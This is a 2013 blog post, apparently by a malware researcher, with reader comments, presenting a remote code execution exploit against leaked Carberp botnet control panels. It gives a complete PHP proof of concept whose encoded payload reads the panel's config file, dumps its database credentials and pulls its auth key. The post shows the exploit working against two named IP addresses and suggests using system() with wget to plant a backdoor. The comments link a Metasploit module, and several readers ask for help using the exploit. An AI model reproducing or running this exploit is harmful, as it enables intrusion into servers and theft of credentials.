Friday 28 June 2013

Carberp Remote Code Execution: Carpwned

Everyone are looking at the Carberp source, bootkit and other components but did people investigated the panels source ?
I don't know who did the PHP but he deserve a medal, it's more easy to hack than SpyEye. (yeah i didn't think it was possible too)

Here i will talk about a simple code injection but there is a lot of others vulnerabilities in theses leaked panels.
e.g: stupid code allow IP spoofing:

No but seriously the best vulnerability is the RCE one, the guys who coded this is really mentally retarded:
look at this eval() look !

Oh good timing, some Carberp C&C appeared on vx.vault:

Let's write a spl0it now, i think most of you come here for a PoC right ?
Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable :(</font>"; }
}
}
?></td>
</tr>
</table>

The 'encoded' part do a file_get_contents() on includes/config.php
Then connect to the SQL db and show the Carberp credentials. (in case if we don't have phpMyAdmin)
But it would be useless if we can't show the login page due to Auth key so it parse index.php and retrieve it.
Cool payload huh ?
Let's test it so...

37.221.165.123:

91.214.202.117:

I've tested on some others C&C and everything went fine.
And it's a RCE so you can execute some cool shit like system('wget http://xxx.xxx');
To download a backdoor or whatever...

Here are some screenshots of the panel:

Bots:

Diagram all:

Diagram live:

Diagram OS:

Diagram AV:

Diagram Rights:
Wait... a 'diagram' ?!

Tasks:

Logs:

Passwd:

AutoSystem:

Settings:
oh really, who's fucked now ?




35 comments:

  1. End up getting "URL is not valid"

    ReplyDelete
  2. Very creative thinking to include the config.php file and then just echo'ing out the local variables that way

    ReplyDelete
  3. Be very handy, but now that it's exposed people who know how to code will end up fixing it.

    But it will come in handy for the kids.

    ReplyDelete
  4. nice one with kornheiser

    ReplyDelete
  5. Another brutal ownage

    ReplyDelete
  6. Maybe it intentionally left vulnerable as a backdoor to buyer panels..

    ReplyDelete
  7. You can find a few separate RCE vulns if you look around at some of the other web-accessible accessible files.

    ReplyDelete
    Replies
    1. yep this is not the only one, the panel is full of critical bugs.

      Delete
    2. Yep. I think it's the most shittily coded PHP malware panel I've ever seen, which is pretty funny considering the pricetag on this thing.

      Delete
    3. I am curious, what is your preferred approach of finding holes in such software? Do you grep for things like eval() and SQL statements, or look at every file in order, or use automated scanners? A lot of people just fly by seats of their pants, but I get an impression that there's method to your madness

      Delete
    4. I'm also wondering, really interested.

      Delete
    5. Few 'simple example' arts about answering to your questions (how to find...) you will find at http://HauntIT.blogspot.com

      cheers

      Delete
  8. wont be surprised if it was just one person who coded the entire project.

    ReplyDelete
  9. How about you try to "exploit" zeus panel, :)

    ReplyDelete
  10. I am curious did you learn about programming and everything else at university or self taught?

    Also know any good tutorials for beginners?

    ReplyDelete
  11. Not actually an RCE. Maybe you think this key was the same on every c&c installation? Nope.

    ReplyDelete
    Replies
    1. It's the same on every C&C, install carberp on different servers and you will see.
      Did you even know what's you are talking about ?

      Delete
    2. I'm not the guy you were talking to but i just checked it, i tend to get results but they all look like this

      (E¿¦g„±S^K ¨‘fyÆ}Ð N*£¤rÅÖt¾¤Ì} è뀡y)

      Delete
    3. Of couse I know what I'm talking about.
      Did you see carberp C&C's insides before source leakage? I did. And I know a lot of different backdoor keys (BOTNETCHECKUPDATER0-xxx). Before leakage, every single client had its own ioncubed c&c with different backdoor key.
      Now, when script kiddies started installing leaked carberp c&cs, we can expect c&cs with the same backdoor key.

      Delete
    4. okay, i got no opportunity to look at the others carberp before this leak so i don't know what's look the no leaked version if they are differents.
      For the moment all carberp i looked into was from the leaked package and who use obviously all the same key.
      this is why i've says i tried on different servers and everything was correctly exploited.

      Delete
  12. LMFAO, when you see it in the PHP documentation ... http://php.net/manual/en/function.eval.php

    ReplyDelete
  13. metasploit module can be found here:
    http://packetstormsecurity.com/files/122230/carberp_backdoor_exec.rb.txt

    ReplyDelete
  14. B-but your PoC is vuln to XSS! What if the evil C&C serves a browser exploit!

    Just kidding, thanks for the good read as always :)

    ReplyDelete
  15. How do you found carberp panel ?

    ReplyDelete
  16. Writer, can you explain in sesamestreet lingo what you just have done. Whats can be done with these vulnerabilities.

    ReplyDelete
  17. kiddie audience listens :-P

    ReplyDelete
  18. MASTER, please teach us how to find carberp panel

    ReplyDelete
  19. Fatal error: Call to undefined function curl_init()

    i dont know how is that i rename in php and open Via localhost ;) ???

    ReplyDelete
  20. I think, you don't have curl/php_curl installed

    ReplyDelete
  21. Lol these people call themselves malware coders?
    This shit wasn't even worth 1$.

    ReplyDelete